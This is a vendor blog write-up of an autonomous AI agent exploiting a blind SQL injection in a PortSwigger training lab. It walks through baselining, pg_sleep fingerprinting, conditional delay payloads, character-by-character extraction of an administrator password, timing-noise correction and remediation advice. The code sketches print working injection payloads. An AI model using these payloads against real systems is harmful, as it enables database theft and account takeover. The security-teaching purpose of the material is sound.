
How Synack’s Autonomous AI Agent Identifies and Exploits a SQL Injection Vulnerability

22 Dec 2025
James Thatcher

Caption: PortSwigger representation of how to approach a SQL injection.

In the following scenario, the target application uses a tracking cookie that is vulnerable to SQL injection. However, the vulnerability is “blind” and does not return any data directly. The agent must use time delays to infer information. The goals for the Synack Autonomous AI agent known as Sara in this exercise are to:

  • Confirm the blind SQL injection vulnerability.
  • Determine the database type.
  • Extract the administrator’s password, character by character.
  • Log in to the application as the administrator.

NOTE: To test the Synack AI Agent, we used this lab from PortSwigger’s Web Security Academy. These are the same exercises that human pentesters use to learn the trade.

Step 1

Before attempting any exploitation, Sara enumerated the application for user-controlled input, then established baseline response times across multiple requests to understand normal application behavior.
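The baselining idea can be sketched in a few lines. This is a simplified model, not Sara's actual code, and the sample timings are illustrative (chosen to match the ~0.8s baseline described later in this write-up):

```python
# Sketch: derive a "hit" threshold for a time-based payload from baseline
# response times. Sample values are illustrative, not real measurements.
import statistics

def timing_threshold(baseline_samples, injected_delay, margin=0.5):
    """Minimum response time that counts as a 'hit': the mean baseline
    plus the injected delay, minus a safety margin so slightly fast
    hits are not missed."""
    return statistics.mean(baseline_samples) + injected_delay - margin

# Illustrative baseline of ~0.8s:
samples = [0.79, 0.82, 0.80, 0.77, 0.84]
threshold = timing_threshold(samples, injected_delay=2.0)
print(round(threshold, 2))  # 2.3: responses slower than this count as hits
```

Without this step, any threshold would be a guess relative to unknown network latency.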

Agent thinking:

Agent action:


Step 2

Sara then tested multiple injection points methodically, starting with the category URL parameter before moving to the TrackingId cookie. The agent injected multiple payloads, including the PostgreSQL-specific function pg_sleep, a strategic move to simultaneously test for time-based vulnerabilities and confirm that the backend database was PostgreSQL rather than MySQL or MSSQL.

Agent thinking:

Agent action:

Rather than guessing, the agent tested each input vector and let the evidence guide the investigation, confirming the cookie was the vulnerable surface. Sara understood that time-based blind injection requires distinguishing deliberate delays from network variance; without baselines, false positives would be inevitable.
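One simple way to make that distinction robust, sketched here as a hedged model rather than Sara's actual decision logic, is to require a response to clear the baseline by most of the injected delay and to demand agreement across repeated trials:

```python
# Sketch: classify a response as a time-based "hit" only when it clears
# the baseline by most of the injected delay, and use a majority vote
# across repeated trials to filter out one-off network spikes.
def is_hit(elapsed, baseline, delay, factor=0.8):
    return elapsed >= baseline + factor * delay

def confirmed_hit(trials, baseline, delay):
    hits = sum(is_hit(t, baseline, delay) for t in trials)
    return hits > len(trials) // 2  # majority vote across repeats

# One jitter spike among normal responses is rejected:
print(confirmed_hit([1.74, 0.85, 0.91], baseline=0.8, delay=1.0))  # False
# Consistent delays across trials are accepted:
print(confirmed_hit([1.82, 1.79, 1.88], baseline=0.8, delay=1.0))  # True
```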

Step 3

The agent confirmed PostgreSQL as the backend by observing which sleep syntax worked. 

Agent thinking:

Agent action:

This informed all subsequent payload construction: the agent now knew to use pg_sleep() rather than MySQL’s SLEEP() or MSSQL’s WAITFOR DELAY.
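The fingerprinting logic reduces to a lookup of per-backend delay primitives: whichever payload produces a measurable delay identifies the DBMS. The payload strings below are illustrative; real ones depend on the exact injection context:

```python
# Sketch: each backend has its own delay primitive, so the payload that
# actually causes a delay reveals the database type.
SLEEP_PAYLOADS = {
    "PostgreSQL": "'; SELECT pg_sleep(2)--",          # stacked query
    "MySQL":      "' AND SLEEP(2)-- -",
    "MSSQL":      "'; WAITFOR DELAY '0:0:2'--",
    "Oracle":     "' AND DBMS_PIPE.RECEIVE_MESSAGE('a',2)=1--",
}

def fingerprint(delayed_payloads):
    """Given the set of payloads that caused a delay, return the
    matching backend names."""
    return [db for db, p in SLEEP_PAYLOADS.items() if p in delayed_payloads]

print(fingerprint({"'; SELECT pg_sleep(2)--"}))  # ['PostgreSQL']
```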

Step 4

The agent crafted boolean conditional payloads to prove it could control application behavior based on true/false database conditions.

Agent thinking:

Agent action:

This proved the agent could extract arbitrary information bit by bit: the foundation of data exfiltration in blind injection.
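The classic shape of such a conditional payload, assuming the stacked-query PostgreSQL context described in the report below, can be sketched with a small builder function (the function name and structure are illustrative):

```python
# Sketch: turn any boolean SQL expression into a timing signal by
# delaying only when the condition is true (PostgreSQL syntax).
def conditional_payload(condition, delay=2):
    return (f"'; SELECT CASE WHEN ({condition}) "
            f"THEN pg_sleep({delay}) ELSE pg_sleep(0) END--")

print(conditional_payload("1=1"))  # slow response expected (condition true)
print(conditional_payload("1=2"))  # fast response expected (condition false)
```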

Step 5

Before attempting password extraction, the agent verified the administrator user existed in the users table.

Agent thinking:

Agent action:

Agent thinking:

Payload logic:

This validated the attack path. Attempting to extract a password for a non-existent user would waste cycles and yield meaningless data.
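An existence check of this kind can be sketched as follows. The helper name and the exact subquery are illustrative assumptions, but the principle matches the report below: the payload delays only if a row for the target username exists, so a slow response means "user found":

```python
# Sketch: delay only when a row for `username` exists in the users table,
# so response time answers the yes/no question. Illustrative payload shape.
def user_exists_payload(username, delay=2):
    cond = f"(SELECT 'a' FROM users WHERE username='{username}') = 'a'"
    return (f"'; SELECT CASE WHEN ({cond}) "
            f"THEN pg_sleep({delay}) ELSE pg_sleep(0) END--")

print(user_exists_payload("administrator"))
```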

Step 6

The agent used binary search logic to efficiently determine password length before character extraction.
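The efficiency gain is easy to see in a sketch. Here `oracle(n)` stands in for one timed request asking "is LENGTH(password) > n?"; it is simulated against a known length so the search logic itself can be checked:

```python
# Sketch: binary search for the secret's length. oracle(n) is True iff
# the secret is longer than n; each call would be one timed request.
def find_length(oracle, lo=0, hi=64):
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(mid):       # secret length > mid
            lo = mid + 1
        else:
            hi = mid
    return lo

# Simulated oracle for a 20-character secret:
print(find_length(lambda n: 20 > n))  # 20, in ~6 requests instead of 20+
```

Linear probing would need one request per candidate length; the binary search needs only log2 of the search space.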

Agent thinking:

Agent action:

Agent thinking:

Agent action:

Agent thinking:

Step 7

The agent then proceeded to extract the administrator password. The first extracted password (deg25iarwwftfv3deivv) failed to log in. The agent hypothesized that timing variance had caused character misreads and re-ran the extraction with longer delays.
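The extraction loop itself can be sketched like this. `char_oracle(pos, ch)` stands in for one timed request testing whether the character at position `pos` equals `ch`; it is simulated here, and the charset (lowercase letters plus digits, consistent with the passwords shown) is an assumption:

```python
# Sketch: character-by-character extraction driven by a timing oracle.
# char_oracle(pos, ch) would be one timed request per candidate character.
import string

CHARSET = string.ascii_lowercase + string.digits  # assumed charset

def extract(char_oracle, length):
    out = []
    for pos in range(1, length + 1):
        for ch in CHARSET:
            if char_oracle(pos, ch):
                out.append(ch)
                break
        else:
            out.append("?")   # no candidate matched: flag for re-extraction
    return "".join(out)

# Simulated oracle against the password reported in this write-up:
secret = "d7g25iarwwftfv3delvv"
recovered = extract(lambda p, c: secret[p - 1] == c, len(secret))
print(recovered)
```

A jittery oracle is exactly what corrupts this loop: a single spurious "yes" commits a wrong character, which is why the agent re-ran it with longer delays.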

Agent action:

Agent thinking:

Agent thinking:

Agent action:

Agent thinking:

Agent thinking:

This demonstrates resilience. Rather than declaring failure, the agent diagnosed the likely root cause (network timing noise) and adjusted its methodology, a critical capability for real-world security testing.

The table below highlights the specific moments where the agent’s initial extraction failed due to network “noise” mimicking a database delay.

In the 1st Attempt, the agent used a 1-second sleep command. With a normal response time of ~0.8s, a valid “hit” should be ~1.8s. However, normal network lag occasionally caused incorrect characters (like ‘e’ and ‘i’) to return in ~1.5s – 1.7s. Because these times exceeded the agent’s 1.0s threshold, they were accepted as hits and became false positives.

In the 2nd Attempt, the agent increased the sleep time to 2 seconds. This pushed valid “hits” to ~2.7s, creating a safe margin that normal network variance could not accidentally reach.

Position | 1st Attempt (1s delay) | 2nd Attempt (2s delay) | Diagnosis
2        | e (1.74s)              | 7 (2.74s)              | False Positive: In the first attempt, a network spike (1.74s) looked like a valid 1s delay. The 2s delay clarified that the true character is ‘7’.
18       | i (1.54s)              | l (2.75s)              | False Positive: The ‘i’ response (1.54s) was dangerously close to the threshold. Increasing the delay proved the character was actually ‘l’.

This comparison demonstrates why the signal-to-noise ratio is critical in blind SQL injection. By dynamically increasing the delay, the agent successfully filtered out the network jitter that plagued the first attempt.
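The margins above can be checked with back-of-the-envelope arithmetic, using the numbers from this write-up (~0.8s baseline, jitter spikes up to ~1.74s):

```python
# Sketch: gap between the slowest plausible "miss" (baseline + jitter)
# and the fastest true "hit" (baseline + injected delay).
def margin(baseline, delay, worst_jitter_elapsed):
    return (baseline + delay) - worst_jitter_elapsed

print(round(margin(0.8, 1.0, 1.74), 2))  # 0.06: hits overlap jitter at 1s
print(round(margin(0.8, 2.0, 1.74), 2))  # 1.06: ~1s of safety at 2s
```

With a 1-second sleep the separation between signal and noise was only a few hundredths of a second; doubling the delay bought roughly a full second of margin.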

Step 8

With the attack path validated and the administrator verified, Sara transitions from exploitation to documentation. To ensure the engineering team can reproduce and fix the issue, the agent autonomously generates a fully functional proof of concept script.
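The skeleton of such a PoC might look like the following. The target URL is a placeholder, and this sketch only builds the request carrying the payload in the TrackingId cookie; a real PoC would URL-encode the payload, send the request, and time the response:

```python
# Hedged sketch of a PoC skeleton: construct (but do not send) the
# request that carries a timing payload in the TrackingId cookie.
import urllib.request

def build_probe(base_url, payload):
    """Attach the payload to the vulnerable TrackingId cookie.
    NOTE: a real PoC must URL-encode the payload for the Cookie header."""
    req = urllib.request.Request(base_url)
    req.add_header("Cookie", f"TrackingId=x{payload}")
    return req

req = build_probe("https://TARGET.example/filter",   # placeholder URL
                  "'; SELECT pg_sleep(2)--")
print(req.get_header("Cookie"))
```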

Agent thinking:

Agent action:

Finally, Sara synthesizes the technical data into a vulnerability report. This includes a detailed description, impact analysis, and specific remediation steps, mirroring the high-quality deliverables expected from Security Researchers.

Description

The application is vulnerable to time-based blind SQL injection through the TrackingId cookie. The cookie value is concatenated directly into a PostgreSQL query without proper sanitization or parameterization. An attacker can inject SQL statements using the stacked query syntax (;) combined with PostgreSQL’s pg_sleep() function to cause measurable time delays. By observing response times, an attacker can infer boolean conditions about database contents, allowing extraction of sensitive data character by character.

Impact

An attacker can extract arbitrary data from the database including usernames, passwords, and other sensitive information. This was demonstrated by successfully extracting the administrator password (d7g25iarwwftfv3delvv). With valid credentials, an attacker could gain unauthorized administrative access to the application, potentially leading to full system compromise.

Vulnerability Category

SQL Injection

Remediation

  1. Use parameterized queries (prepared statements) for all database interactions instead of string concatenation. 
  2. Implement input validation to reject unexpected characters in the TrackingId cookie. 
  3. Apply the principle of least privilege to the database user – it should not have access to the users table if not needed for tracking functionality. 
  4. Consider using a Web Application Firewall (WAF) as defense-in-depth. 
  5. Implement rate limiting on requests to slow down time-based extraction attacks.
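Remediation step 1 is the decisive fix. As an illustration, here is the parameterization pattern using Python's stdlib sqlite3 module (the lab's backend is PostgreSQL, but the principle is identical across DB-API drivers):

```python
# Illustration of remediation #1: a placeholder keeps the cookie value
# as pure data, so the injected SQL is never parsed as SQL.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE tracking (id TEXT)")
conn.execute("INSERT INTO tracking VALUES ('abc123')")

tracking_id = "x'; SELECT pg_sleep(2)--"   # hostile cookie value

rows = conn.execute(
    "SELECT id FROM tracking WHERE id = ?", (tracking_id,)
).fetchall()
print(rows)  # []: the payload matched nothing and executed nothing
```

Had the query been built by string concatenation, the same value would have terminated the string literal and appended attacker-controlled SQL.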

Key lessons:

1. Autonomous Self-Correction

  • The Context: Standard automated scanners usually stop after a failed attempt or report a false positive. When Sara’s first extracted password (deg25iarwwftfv3deivv) failed to work, the agent didn’t quit.
  • The Lesson: Instead, it diagnosed the root cause (network timing “noise” interfering with the character extraction) and autonomously recalibrated its approach by increasing the delay threshold to successfully re-extract the correct credentials (d7g25iarwwftfv3delvv).

2. Intelligent Baselining vs. Blind Fuzzing

  • The Context: The application had a natural latency of ~0.8 seconds. A simple script looking for a 1-second delay would have been plagued by false positives from this latency variance.
  • The Lesson: The agent recognized this environmental constraint before attacking. It calculated that a standard delay was insufficient and dynamically adjusted to a 2-second sleep payload to ensure a statistically significant signal-to-noise ratio.

3. Outcome-Driven Validation

  • The Context: Blind SQL injection is notorious for false positives because it relies on inferring data from time delays rather than seeing the data directly.
  • The Lesson: Sara went beyond technical confirmation. By taking the extracted password and successfully performing an administrative login, the agent converted a theoretical technical finding into a proven business risk.

Sara demonstrated a complete security testing methodology: establishing baselines, testing multiple attack surfaces, fingerprinting the database, validating conditional logic, enumerating targets, optimizing extraction efficiency, and recovering from errors. 

The entire engagement, from initial reconnaissance to successful login as administrator, followed a structured, evidence-driven approach that customers should expect from Synack’s autonomous agent.

For more information about Synack’s approach to AI red teaming, download the Synack Guide to Agentic AI Pentesting.